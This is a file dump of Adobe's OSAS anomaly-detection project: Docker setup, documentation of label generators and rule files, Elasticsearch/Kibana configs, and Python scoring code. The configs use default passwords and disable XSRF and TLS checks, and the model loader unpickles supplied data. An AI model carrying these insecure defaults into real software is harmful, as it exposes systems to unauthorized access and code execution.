28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 |     locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 | 
34 | RUN echo "Cloning OSAS" && \
35 |     cd / && \
36 |     git clone https://github.com/adobe/OSAS.git && \
37 |     mv OSAS osas
38 | 
39 | RUN cd /osas/ && \
40 |     pip3 install --no-cache-dir -r requirements.txt
41 | 
42 | 
43 | CMD /osas/scripts/run_services.sh & cd /osas && python3 osas/webserver.py
44 | 
45 | 


--------------------------------------------------------------------------------
/docs/PIPELINE_CONFIGURATION.md:
--------------------------------------------------------------------------------
 1 | # Pipeline explained
 2 | 
 3 | The pipeline sequentially applies all label generators on the raw data, collects the labels and uses an anomaly scoring algorithm to generate anomaly scores. 
 4 | There are two main component classes: LabelGenerator and ScoringAlgorithm.
 5 | 
 6 | ## Label generators
 7 | 
 8 | **NumericField**
 9 | 
10 | * This type of LabelGenerator handles numerical fields. It can compute in two different ways: (1) the mean and standard deviation and generates labels
11 |     according to the distance between the current value and the mean value (value<=sigma NORMAL, sigma<value<=2*sigma BORDERLINE,
12 |     2*sigma<value OUTLIER) and (2) a spike, which can be either a percentage or fixed amount increase/decrease from the mean and generates labels
13 |     if the event is above/below the spike amount. The numeric field must use either one or both of these calculations to generate labels. If both
14 |     stdev and spike are used, it will only generate labels if an event is a spike from the stdev and not from the mean.
15 | 
16 | Params:
17 | * ***field_name***: what field to look for in the data object
18 | * ***group_by***: when this field is set (not None), statistics are built around the groups obtained using the values of the specified attribute names. For instance, you can use this to compute CPU usage anomalies based on the `station_name` or `cloud_account_id`
19 | * ***label_for_normal***: True/False - when set, it will output labels for normal events. Default `True`
20 | * ***stdev***: True/False - when set, it will use stdev as a calculation method. Default `True`.
21 | * ***stdev_borderline_threshold***: How many standard deviations for an event to be considered borderline. Default `1`.
22 | * ***stdev_outlier_threshold***: How many standard deviations for an event to be considered an outlier. Default `2`.
23 | * ***spike***: none/ratio/fixed - when set (not none), will use ratio or fixed spike calculation. Default `none`.
24 | * ***spike_inverse***: True/False - when set, will caculate spike as a large decrease from the mean. Default `False`.
25 | * ***spike_borderline_threshold***: How much ratio/fixed amount for an event to be considered borderline. If ratio, a value of 2 is 2x above the mean. If fixed, a value of 10 is 10 above the mean. Default `10`.
26 | * ***spike_outlier_threshold***: How much ratio/fixed amount for an event to be considered an outlier. Default `20`.
27 | 
28 | **TextField**
29 | 
30 | * This type of LabelGenerator handles text fields. It builds a n-gram based language model and computes the
31 |     perplexity of newly observed data. It also holds statistics over the training data (mean and stdev).
32 |     (perplexity<=sigma NORMAL, sigma<preplexity<=2*sigma BORDERLINE,
33 |     2*perplexity<value OUTLIER)
34 | 
35 | Params:
36 | 
37 | * ***field_name:*** What field to look for
38 | * ***lm_mode:*** Type of LM to build: char or token
39 | * ***ngram_range:*** N-gram range to use for computation
40 | 
41 | **MultinomialField**
42 | * This type of LabelGenerator handles fields with discreet value sets. It computes the probability of seeing a specific value and alerts based on relative and absolute thresholds. If `group_by` is specified, this label generator will compute statistics for target values by first creating buckets.
43 | 
44 | Params
45 | * ***field_name:*** What field to use
46 | * ***absolute_threshold:*** Minimum absolute value for occurrences to trigger alert for
47 | * ***relative_threshold:*** Minimum relative value for occurrences to trigger alert for
48 | * ***group_by***: when this field is set (not None), statistics are built around the groups obtained using the values of the specified attribute names. For instance, you can use this to compute anomalies for `country_name` login based on the `username`
49 | 
50 | **MultinomialFieldCombiner**
51 | * This type of LabelGenerator handles fields with discreet value sets and build advanced features by combining values across the same dataset entry. It computes the probability of seeing a specific value and alerts based on relative and absolute thresholds.  If `group_by` is specified, this label generator will compute statistics for target values by first creating buckets.
52 | 
53 | Params
54 | * ***field_names:*** What fields to combine
55 | * ***absolute_threshold:*** Minimum absolute value for occurrences to trigger alert for
56 | * ***relative_threshold:*** Minimum relative value for occurrences to trigger alert for
57 | * ***group_by***: when this field is set (not None), statistics are built around the groups obtained using the values of the specified attribute names. The same explanation as the one above applies here
58 | 
59 | **KeywordBased**
60 | * This is a rule-based label generators. It applies a simple tokenization procedure on input text, by dropping special characters and numbers and splitting on white-space. It then looks for a specific set of keywords and generates labels accordingly
61 | 
62 | Params:
63 | * ***field_name:*** What field to use
64 | * ***keyword_list:*** The list of keywords to look for
65 | 
66 | OSAS has four unsupervised anomaly detection algorithms:
67 | 
68 | * **IFAnomaly**: n-hot encoding, singular value decomposition, isolation forest (IF)
69 | 
70 | * **LOFAnomaly**: n-hot encoding, singular value decomposition, local outlier factor (LOF)
71 | 
72 | * **SVDAnomaly**: n-hot encoding, singular value decomposition, inverted transform, input reconstruction error
73 | 
74 | * **StatisticalNGramAnomaly**: compute label n-gram probabilities, compute anomaly score as a sum of negative log likelihood
75 | 
76 | ## Supervised Classifiers
77 | 
78 | OSAS now has support for supervised classifiers! You can use this if you have a dataset where the anomalies are already labeled for you. You may ask, why would we still use OSAS for an already labeled dataset instead of just running our own model? That's because you can leverage the OSAS label generators we have for your ML features!
79 | 
80 | Here is an example in a conf file of using the supervised classifier:
81 | ```
82 | [AnomalyScoring]
83 | scoring_algorithm = SupervisedClassifierAnomaly
84 | ground_truth_column = status
85 | classifier = sklearn.ensemble.RandomForestClassifier
86 | n_estimators = 100
87 | random_state = 42
88 | ```
89 | * `scoring_algorithm` must have `SupervisedClassifierAnomaly`.
90 | * `ground_truth_column` is the column in your input .csv file that is the column of your ground truth labels for the supervised task.
91 | * `classifier` is the supervised classifier class you will use. For now, we are only supporting sklearn models and you must provide the full package path of the sklearn model (ex. `sklearn.ensemble.RandomForestClassifier`). NOTE: The sklearn model will only work if there is a `fit` and `predict_proba` function. So, an sklearn model that is a classifier that returns probabilities.
92 | * The rest of the attributes will be passed in to the `classifier`'s constructor when initialized. In this example, `n_estimators` and `random_state` are constructor arguments for the `RandomForestClassifier`.
93 | 
94 | For the `ground_truth_column` in your .csv file, there are certain formats we accept that will affect the output of OSAS. For binary classification tasks, you may label your ground truth labels as either `clean`/`bad` or `0`/`1`, `1` being a `bad` label. If you use one of these two naming conventions, the output scores will be returned as a probability score of the input being `bad` (eg. between 0 and 1). For any other naming convention (for both binary and multi-class classification), the output scores will be returned as the predicted labeled rather than a score. For example, if your ground truth labels are `clean`, `unknown`, or `malicious`, then the scores will be returned as either `clean`, `unknown`, or `maclious` rather than the probability of one of these classes.
95 | 


--------------------------------------------------------------------------------
/docs/RULES.md:
--------------------------------------------------------------------------------
 1 | # Rule-based labeling and anomaly scoring
 2 | 
 3 | Once you have a working pipeline, you might want to refine your results by adding some human-expert knowledge on the dataset and generated labels. Using the static rules you can:
 4 | 
 5 | * Add new labels to your dataset: for instance you want to highlight when a special user (say `system@mydatabase.com`) seems to connect from non-standard countries;
 6 | * Change the anomaly score by a relative value, based on specific attribute or label(generated) values (for example, add 100 to the anomaly score when the above happens).
 7 | 
 8 | For this, we provide another CLI tool (`osas/main/apply_rules.py`) that takes as input the previously labeled dataset and a folder that contains the static rules, while outputting the modified labels and anomaly scores into a new file:
 9 | 
10 | ```bash
11 | python osas/main/apply_rules.py --help
12 | Usage: apply_rules.py [options]
13 | 
14 | Options:
15 |   -h, --help            show this help message and exit
16 |   --input-file=INPUT_FILE
17 |                         location of the input file
18 |   --rules-folder=RULES_FOLDER
19 |                         location of rules
20 |   --output-file=OUTPUT_FILE
21 |                         output-file (optional)
22 |   --no-elastic          don't push data to Elastic
23 |   ```
24 | 
25 | **Parameters**
26 | * `--input-file`: path to a CSV file, **already processed** by `run_pipeline.py` 
27 | * `--rules-folder`: path to a system folder containing the static rules in `.yaml` format
28 | * `--output-file`: where to store the results
29 | * `--no-elastic`: don't push data back to elastic (useful when OSAS is run outside the distributed Docker image)
30 | 
31 | **Note:** OSAS will apply all the rules inside the folder.
32 | 
33 | ## The format of rule files
34 | 
35 | If you are an impatient reader, you can skip this section and go straight to the example. Everything inside the rule files is self-explanatory and the practical example will probably clarify everything else.
36 | 
37 | Rules are stored in `YAML` format and must saved in files that have the `.yaml` extension. 
38 | Each rule must contain the following mandatory attributes:
39 | 
40 | * `rule name`: each rule must have a name (not necessarily unique)
41 | * `rule label`: what label you want to add if this specific rule is a match for one of the examples in your dataset
42 | * `rule score`: this is a floating point value, that will modify the original anomaly scoring. 
43 | * `conditions`: this should indicate a list of conditions that will be the trigger for this rule. The boolean operation between them is `OR`
44 | 
45 | Each condition has a free-form `label` (key) that is not used anywhere else, except for making the file readable to those who edit it. Then it is followed by a list of attribute names (columns in the CSV) with their possible value/values. The logical operation between attribute matches is `AND` and the logical operator between values is `OR`
46 | Also, the attribute values are regular expression, to allow for wild-cards.
47 | 
48 | ## Example
49 | 
50 | Say you have a dataset that contains user logins with origin country, ip address (`host`) and timestamp. Also, your infrastructure has some automation that works by connecting to the server from a host with a known IP address (`10.10.10.10`) and user (`privileged@system`).
51 | Additionally, you used the Knowledge based label generator to create a special label to reflect the time of day: `EARLY_MORNING`, `EVENING`, `NIGHT`, and you know that the automation should only run at night.
52 | 
53 | This is how a rule would look like:
54 | 
55 | ```yaml
56 | rule name: privileged login from unknown ip or outside normal hours
57 | rule label: DANGER_FOR_AUTOMATION_ACCOUNT
58 | rule score: +500
59 | conditions:
60 |   privileged_unkown_ip:
61 |     host: ^((?!10.10.10.10).)*$
62 |     username: privileged@system
63 |   automation_outside_normal_hours:
64 |     labels:
65 |       - EARLY_MORNING
66 |       - EVENING
67 |     username: privileged@system
68 | ```
69 | 
70 | Short explanation:
71 | 1. The rule name is `privileged login from unknown ip or outside normal hours`, indicating clearly what it does;
72 | 2. The label `DANGER_FOR_AUTOMATION_ACCOUNT` will get added to every example that matches this rule;
73 | 3. Every time the rule is matched, the anomaly score will get increased by 500;
74 | 4. The rule has two conditions that can be matched independently: `privileged_unkown_ip` and `automation_outside_normal_hours`. If either one of these conditions match, the rule will get executed;
75 | 5. Rule 1 (`privileged_unkown_ip`) - looks at the username and expects it to be `privileged@system`. Also, it wants the `host` value to be anything else than `10.10.10.10`
76 | 6. Rule 2 (`automation_outside_normal_hours`) - also looks at the username and expects it to be `privileged@system`. Additionally, it checks the labels for any of the two values specified in the list: `EARLY_MORNING` and `EVENING`
77 | 
78 | We hope that this explains the way rules are applied and how you can build the boolean login around them.
79 | 
80 | ## Tips and tricks
81 | 
82 | **Tip 1:** The `rule score`, is a modifier that can be positive or negative. Use positive values to highlight alerts, negative values to whitelist events and 0 if you just want the rule-label added;
83 | 
84 | **Tip 2:** If the attribute name is `labels` than the condition will apply on the labels that OSAS added in the `run_pipeline.py` step;
85 | 
86 | 
87 | 


--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [build-system]
2 | requires = [
3 |     "setuptools>=42",
4 |     "wheel"
5 | ]
6 | build-backend = "setuptools.build_meta"
7 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | click==8.1.8
 2 | elasticsearch==9.0.1
 3 | Flask==3.1.0
 4 | ipdb==0.13.13
 5 | numpy==2.2.5
 6 | obfuscation_detection>=1.0.0
 7 | pandas==2.2.3
 8 | python-decouple==3.8
 9 | PyYAML==6.0.2
10 | scikit_learn==1.6.1
11 | setuptools==65.5.1
12 | tqdm==4.67.1
13 | 


--------------------------------------------------------------------------------
/resources/.KEEP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/resources/.KEEP


--------------------------------------------------------------------------------
/scripts/config/elasticsearch.yml:
--------------------------------------------------------------------------------
 1 | opendistro_security.ssl.transport.pemcert_filepath: esnode.pem
 2 | opendistro_security.ssl.transport.pemkey_filepath: esnode-key.pem
 3 | opendistro_security.ssl.transport.pemtrustedcas_filepath: root-ca.pem
 4 | opendistro_security.ssl.transport.enforce_hostname_verification: false
 5 | opendistro_security.ssl.http.pemcert_filepath: esnode.pem
 6 | opendistro_security.ssl.http.pemkey_filepath: esnode-key.pem
 7 | opendistro_security.ssl.http.pemtrustedcas_filepath: root-ca.pem
 8 | opendistro_security.allow_unsafe_democertificates: true
 9 | opendistro_security.allow_default_init_securityindex: true
10 | opendistro_security.authcz.admin_dn:
11 |   - CN=kirk,OU=client,O=client,L=test, C=de
12 | 
13 | opendistro_security.audit.type: internal_elasticsearch
14 | opendistro_security.enable_snapshot_restore_privilege: true
15 | opendistro_security.check_snapshot_restore_write_privileges: true
16 | opendistro_security.restapi.roles_enabled: ["all_access", "security_rest_api_access"]
17 | opendistro_security.system_indices.enabled: true
18 | opendistro_security.system_indices.indices: [".opendistro-alerting-config", ".opendistro-alerting-alert*", ".opendistro-anomaly-results*", ".opendistro-anomaly-detector*", ".opendistro-anomaly-checkpoints", ".opendistro-anomaly-detection-state", ".opendistro-reports-*", ".opendistro-notifications-*", ".opendistro-notebooks", ".opendistro-asynchronous-search-response*"]
19 | cluster.routing.allocation.disk.threshold_enabled: false
20 | node.max_local_storage_nodes: 3
21 | path:
22 |     data: /data/elastic/data
23 |     logs: /data/elastic/logs
24 | 
25 | opendistro_security.ssl.http.enabled: false


--------------------------------------------------------------------------------
/scripts/config/kibana.yml:
--------------------------------------------------------------------------------
 1 | elasticsearch.hosts: http://localhost:9200
 2 | elasticsearch.ssl.verificationMode: none
 3 | elasticsearch.username: kibanaserver
 4 | elasticsearch.password: kibanaserver
 5 | elasticsearch.requestHeadersWhitelist: ["securitytenant","Authorization"]
 6 | 
 7 | opendistro_security.multitenancy.enabled: true
 8 | opendistro_security.multitenancy.tenants.preferred: ["Private", "Global"]
 9 | opendistro_security.readonly_mode.roles: ["kibana_read_only"]
10 | 
11 | #pendistro_security.cookie.secure: false
12 | 
13 | newsfeed.enabled: false
14 | telemetry.optIn: false
15 | telemetry.enabled: false
16 | security.showInsecureClusterWarning: false
17 | server.host: "0.0.0.0"
18 | server.xsrf.disableProtection: true
19 | 


--------------------------------------------------------------------------------
/scripts/run_services.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | mkdir -p /data/elastic/logs
 3 | mkdir -p /data/elastic/data
 4 | mkdir -p /data/kibana
 5 | #/etc/init.d/elasticsearch restart
 6 | cd /elasticsearch/
 7 | ./opendistro-tar-install.sh
 8 | 
 9 | 
10 | cd /osas/scripts/tmp_data
11 | 
12 | 
13 | 
14 | echo "copying data to data"
15 | tar -xvf data.tar.gz  -C /
16 | 
17 | 
18 | 
19 | cp /osas/scripts/config/elasticsearch.yml /elasticsearch/config/
20 | cp /osas/scripts/config/kibana.yml /opendistroforelasticsearch-kibana/config/
21 | 
22 | 
23 | 
24 | 
25 | chown elasticsearch:elasticsearch /data/elastic -R
26 | chown elasticsearch:elasticsearch /elasticsearch -R
27 | 
28 | 
29 | 
30 | 
31 | sudo -H -u elasticsearch bash -c 'ES_PATH_CONF=/elasticsearch/config /elasticsearch/bin/elasticsearch &'
32 | DATA_PATH=/data/kibana /opendistroforelasticsearch-kibana/bin/kibana -c /opendistroforelasticsearch-kibana/config/kibana.yml --allow-root &
33 | 
34 | cd /osas/
35 | export TERM=xterm
36 | #python3 osas/webserver.py
37 | 
38 | 
39 | 
40 | 
41 | #########in prod this should be taken out
42 | #echo "sleep before data push"
43 | #sleep 60
44 | #cd /osas/scripts/tmp_data
45 | #
46 | #python3 json_uploader.py


--------------------------------------------------------------------------------
/scripts/tmp_data/data.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/scripts/tmp_data/data.tar.gz


--------------------------------------------------------------------------------
/scripts/tmp_data/json_uploader.py:
--------------------------------------------------------------------------------
 1 | import csv
 2 | import json
 3 | from elasticsearch import helpers, Elasticsearch
 4 | 
 5 | es = Elasticsearch([{'host': 'localhost', 'port': 9200}],http_auth=('admin', 'admin'))
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 | data=json.loads(open('result_with_score.json', 'r').read())
12 | 
13 | helpers.bulk(es, data, index="anomalies", doc_type="type")


--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
 1 | import setuptools
 2 | import os
 3 | 
 4 | with open("README.md", "r", encoding="utf-8") as fh:
 5 |     long_description = fh.read()
 6 | 
 7 | def parse_requirements(filename):
 8 |     """ load requirements from a pip requirements file """
 9 |     lineiter = (line.strip() for line in open(filename))
10 |     return [line for line in lineiter if line and not line.startswith("#")]
11 | 
12 | 
13 | setuptools.setup(
14 |     name="osas",
15 |     version="0.9.3",
16 |     author="Multiple Authors",
17 |     author_email="boros@adobe.com",
18 |     description="One Stop Anomaly Shop",
19 |     long_description=long_description,
20 |     long_description_content_type="text/markdown",
21 |     url="https://github.com/adobe/OSAS/",
22 |     project_urls={
23 |         "Source Code": "https://github.com/adobe/OSAS/",
24 |         "Bug Tracker": "https://github.com/adobe/OSAS/issues",
25 |         "Documentation": "https://github.com/adobe/OSAS/docs/"
26 |     },
27 |     classifiers=[
28 |         "Programming Language :: Python :: 3.0",
29 |         "License :: OSI Approved :: Apache Software License",
30 |         "Operating System :: OS Independent",
31 |     ],
32 |     packages=setuptools.find_packages("src"),
33 |     python_requires=">=3.10",
34 |     include_package_data=True,
35 |     install_requires=parse_requirements("requirements.txt"),
36 |     package_dir={"": "src"},
37 |     entry_points = {
38 |         "console_scripts": [
39 |             "osas = osas.cli:main"
40 |         ]
41 |     }
42 | )
43 | 


--------------------------------------------------------------------------------
/src/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/__init__.py


--------------------------------------------------------------------------------
/src/osas/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/__init__.py


--------------------------------------------------------------------------------
/src/osas/api.py:
--------------------------------------------------------------------------------
  1 | import configparser
  2 | import sys
  3 | import hashlib
  4 | import io
  5 | import json
  6 | import time
  7 | 
  8 | sys.path.append('')
  9 | 
 10 | from src.osas.pipeline import Pipeline
 11 | from src.osas.pipeline import DetectAnomalies
 12 | from src.osas.pipeline import GroomData
 13 | 
 14 | 
 15 | class OSASConfig:
 16 |     def __init__(self, configparser: configparser.ConfigParser):
 17 |         '''
 18 |         Create a new instance of OSAS configuration. If you don't want to manually use configparser to parse the input, use one of the helper methods: from_file or from_string
 19 |         @param configparser - instance of type RawConfigParser
 20 |         '''
 21 |         self._config = configparser
 22 |         # compute md5 of conf file
 23 |         bw = io.StringIO()
 24 |         configparser.write(bw)
 25 |         bw.flush()
 26 |         bw.seek(0)
 27 |         bb = bw.read().encode('utf-8')
 28 |         self._md5 = hashlib.md5(bb).hexdigest()
 29 | 
 30 |     @staticmethod
 31 |     def from_file(filename: str):
 32 |         '''
 33 |         Create a new config instance using the specified filename
 34 | 
 35 |         @param filename: path to file
 36 |         '''
 37 | 
 38 |         cfg = configparser.ConfigParser()
 39 |         with open(filename, 'r') as f:
 40 |             cfg.read_file(f)
 41 | 
 42 |         oc = OSASConfig(cfg)
 43 |         return oc
 44 | 
 45 |     @staticmethod
 46 |     def from_string(string: str):
 47 |         '''
 48 |         Create a new config instance using the specified configuration string
 49 | 
 50 |         @param string: configuration string
 51 |         '''
 52 |         cfg = configparser.RawConfigParser()
 53 |         cfg.read_string(string)
 54 |         oc = OSASConfig(cfg)
 55 |         return oc
 56 | 
 57 |     def md5(self):
 58 |         return self._md5
 59 | 
 60 |     @property
 61 |     def config(self):
 62 |         return self._config
 63 | 
 64 | 
 65 | class OSASPretrainedModel:
 66 |     def __init__(self, string: str):
 67 |         self._json = json.loads(string)
 68 |         self._md5 = hashlib.md5(string.encode('utf-8')).hexdigest()
 69 | 
 70 |     @staticmethod
 71 |     def from_file(filename: str):
 72 |         return OSASPretrainedModel(open(filename).read())
 73 | 
 74 |     @staticmethod
 75 |     def from_string(string: str):
 76 |         return OSASPretrainedModel(string)
 77 | 
 78 |     def md5(self):
 79 |         return self._md5
 80 | 
 81 |     @property
 82 |     def json(self):
 83 |         return self._json
 84 | 
 85 | 
 86 | osas_instances = {}
 87 | 
 88 | 
 89 | class OSAS:
 90 |     def __init__(self, conf: OSASConfig, model: OSASPretrainedModel):
 91 |         self._pipeline = []
 92 |         gd = GroomData()
 93 |         scoring_model_name = conf.config['AnomalyScoring']['scoring_algorithm']
 94 |         for sect in conf.config:
 95 |             if 'generator_type' in conf.config[sect]:
 96 |                 self._pipeline.append(gd.from_pretrained(conf.config[sect]['generator_type'],
 97 |                                                          model.json['model'][sect]))
 98 |         da = DetectAnomalies()
 99 |         self._detect_anomalies = da.get_pretrained_model(scoring_model_name, json.dumps(model.json['scoring']))
100 | 
101 |     @staticmethod
102 |     def get_instance(conf: OSASConfig, model: OSASPretrainedModel):
103 |         total_hash = '{0}_{1}'.format(conf.md5(), model.md5())
104 |         if total_hash not in osas_instances:
105 |             osas_instance = OSAS(conf, model)
106 |             osas_instances[total_hash] = osas_instance
107 |             return osas_instance
108 |         else:
109 |             return osas_instances[total_hash]
110 | 
111 |     def __call__(self, row_dict: dict):
112 |         label_list = []
113 |         for lg in self._pipeline:
114 |             llist = lg(row_dict)
115 |             for label in llist:
116 |                 label_list.append(label)
117 |         # create a dummy entry
118 | 
119 |         dummy_ds = [{'_labels': label_list}]
120 |         score = self._detect_anomalies(dummy_ds, verbose=False)
121 |         return {
122 |             'labels': label_list,
123 |             'score': score
124 |         }
125 | 
126 | 
127 | if __name__ == '__main__':
128 |     cfg = OSASConfig.from_file('tests/model.conf')
129 |     print(cfg.md5())
130 |     mdl = OSASPretrainedModel.from_file('tests/model.json')
131 |     print(mdl.md5())
132 |     time_start = time.time()
133 |     osas = OSAS.get_instance(cfg, mdl)
134 |     time_first_call = time.time()
135 |     osas = OSAS.get_instance(cfg, mdl)
136 |     time_second_call = time.time()
137 |     t1 = time_first_call - time_start
138 |     t2 = time_second_call - time_first_call
139 |     print("Initial instance creation took {0:.8f} seconds".format(t1))
140 |     print("Second call took {0:.8f} seconds".format(t2))
141 |     print("Speedup was {0:.3f}".format(t1 / t2))
142 |     print(osas({
143 |         'countries': 'Somalia',
144 |     }))
145 | 


--------------------------------------------------------------------------------
/src/osas/cli.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2024 Adobe. All rights reserved.
 2 | # This file is licensed to you under the Apache License, Version 2.0 (the "License");
 3 | # you may not use this file except in compliance with the License. You may obtain a copy
 4 | # of the License at http://www.apache.org/licenses/LICENSE-2.0
 5 | 
 6 | # Unless required by applicable law or agreed to in writing, software distributed under
 7 | # the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
 8 | # OF ANY KIND, either express or implied. See the License for the specific language
 9 | # governing permissions and limitations under the License.
10 | 
11 | import os
12 | import os.path
13 | import sys
14 | import click
15 | from decouple import config
16 | import warnings
17 | 
18 | warnings.filterwarnings("ignore", category=UserWarning)
19 | warnings.filterwarnings("ignore", category=DeprecationWarning)
20 | warnings.filterwarnings("ignore", category=Warning)
21 | 
22 | 
23 | def app_version(ctx, param, value):
24 |     if not value or ctx.resilient_parsing:
25 |         return
26 | 
27 |     from importlib.metadata import version
28 | 
29 |     osas_version = version("osas")
30 | 
31 |     click.echo(f"OSAS {osas_version}")
32 |     ctx.exit()
33 | 
34 | 
35 | @click.group()
36 | @click.option(
37 |     "--version",
38 |     is_flag=True,
39 |     callback=app_version,
40 |     expose_value=False,
41 |     is_eager=True,
42 |     help="Show the version and exit.",
43 | )
44 | def main():
45 |     pass
46 | 
47 | 
48 | @click.group()
49 | def ingest():
50 |     pass
51 | 
52 | if __name__ == "__main__":
53 |     # disable all TQDM output
54 |     main()


--------------------------------------------------------------------------------
/src/osas/core/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/core/__init__.py


--------------------------------------------------------------------------------
/src/osas/core/anomaly.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import sys
 20 | import ast
 21 | import numpy as np
 22 | import tqdm
 23 | from sklearn.preprocessing import MultiLabelBinarizer
 24 | from sklearn.decomposition import TruncatedSVD
 25 | from sklearn.neighbors import LocalOutlierFactor
 26 | from sklearn.ensemble import IsolationForest
 27 | import json
 28 | import pickle
 29 | import base64
 30 | import importlib
 31 | 
 32 | sys.path.append('')
 33 | from osas.core.interfaces import AnomalyDetection, Datasource
 34 | 
 35 | 
 36 | class IFAnomaly(AnomalyDetection):
 37 |     """
 38 |     Uses LOF to detect anomalies
 39 |     """
 40 | 
 41 |     def __init__(self):
 42 |         super().__init__()
 43 |         self._model = None
 44 |         self._data_encoder = None
 45 |         self._decompose = None
 46 | 
 47 |     def build_model(self, dataset: Datasource, incremental=False) -> dict:
 48 |         data_encoder = MultiLabelBinarizer()
 49 |         labels = []
 50 |         for item in dataset:
 51 |             labels.append(item['_labels'])
 52 |         data_encoded = data_encoder.fit_transform(labels)
 53 |         self._data_encoder = data_encoder
 54 | 
 55 |         decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
 56 |         data_decomposed = decompose.fit_transform(data_encoded)
 57 |         self._decompose = decompose
 58 | 
 59 |         iso_forest = IsolationForest(random_state=0, n_jobs=4)
 60 |         iso_forest.fit(data_decomposed)
 61 | 
 62 |         self._model = iso_forest
 63 | 
 64 |         model = {'encoder': self._data_encoder,
 65 |                  'SVD': self._decompose,
 66 |                  'iso_forest': self._model
 67 |                  }
 68 |         out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
 69 |         model = {'model': out_model}
 70 |         return model
 71 | 
 72 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
 73 | 
 74 |         labels = []
 75 |         for item in dataset:
 76 |             labels.append(item['_labels'])
 77 |         data_encoded = self._data_encoder.transform(labels)
 78 |         data_decomposed = self._decompose.transform(data_encoded)
 79 |         scores = self._model.score_samples(data_decomposed)
 80 | 
 81 |         return -scores
 82 | 
 83 |     @staticmethod
 84 |     def from_pretrained(pretrained: str) -> AnomalyDetection:
 85 |         tmp = json.loads(pretrained)
 86 |         pre_model = pickle.loads(base64.b64decode(tmp['model']))
 87 |         model = IFAnomaly()
 88 |         model._data_encoder = pre_model['encoder']
 89 |         model._decompose = pre_model['SVD']
 90 |         model._model = pre_model['iso_forest']
 91 | 
 92 |         return model
 93 | 
 94 | 
 95 | class LOFAnomaly(AnomalyDetection):
 96 |     """
 97 |     Uses LOF to detect anomalies
 98 |     """
 99 | 
100 |     def __init__(self):
101 |         super().__init__()
102 |         self._model = None
103 |         self._data_encoder = None
104 |         self._decompose = None
105 | 
106 |     def build_model(self, dataset: Datasource, incremental=False) -> dict:
107 |         data_encoder = MultiLabelBinarizer()
108 |         labels = []
109 |         for item in dataset:
110 |             labels.append(item['_labels'])
111 |         data_encoded = data_encoder.fit_transform(labels)
112 |         self._data_encoder = data_encoder
113 | 
114 |         decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
115 |         data_decomposed = decompose.fit_transform(data_encoded)
116 |         self._decompose = decompose
117 | 
118 |         lof = LocalOutlierFactor(n_neighbors=10, n_jobs=4, novelty=True)
119 |         lof.fit(data_decomposed)
120 | 
121 |         self._model = lof
122 | 
123 |         model = {'encoder': self._data_encoder,
124 |                  'SVD': self._decompose,
125 |                  'LOF': self._model
126 |                  }
127 | 
128 |         out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
129 |         model = {'model': out_model}
130 |         return model
131 | 
132 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
133 | 
134 |         labels = []
135 |         for item in dataset:
136 |             labels.append(item['_labels'])
137 |         data_encoded = self._data_encoder.transform(labels)
138 |         data_decomposed = self._decompose.transform(data_encoded)
139 |         scores = self._model.score_samples(data_decomposed)
140 | 
141 |         return -scores
142 | 
143 |     @staticmethod
144 |     def from_pretrained(pretrained: str) -> AnomalyDetection:
145 |         tmp = json.loads(pretrained)
146 |         pre_model = pickle.loads(base64.b64decode(tmp['model']))
147 |         model = LOFAnomaly()
148 |         model._data_encoder = pre_model['encoder']
149 |         model._decompose = pre_model['SVD']
150 |         model._model = pre_model['LOF']
151 | 
152 |         return model
153 | 
154 | 
155 | class SVDAnomaly(AnomalyDetection):
156 |     """
157 |     Uses an autoencoder to compute anomaly score
158 |     """
159 | 
160 |     def __init__(self):
161 |         super().__init__()
162 |         self._data_encoder = None
163 |         self._model = None
164 | 
165 |     def build_model(self, dataset: Datasource, incremental=False) -> dict:
166 | 
167 |         labels = []
168 |         for item in dataset:
169 |             tmp = []
170 |             for label in item['_labels']:
171 |                 if isinstance(label, str):
172 |                     tmp.append(label)
173 |             labels.append(tmp)
174 | 
175 |         if not incremental:
176 |             data_encoder = MultiLabelBinarizer()
177 |             data_encoded = data_encoder.fit_transform(labels)
178 |         else:
179 |             data_encoder = self._data_encoder
180 |             data_encoded = data_encoder.transform(labels)
181 |         self._data_encoder = data_encoder
182 |         if not incremental:
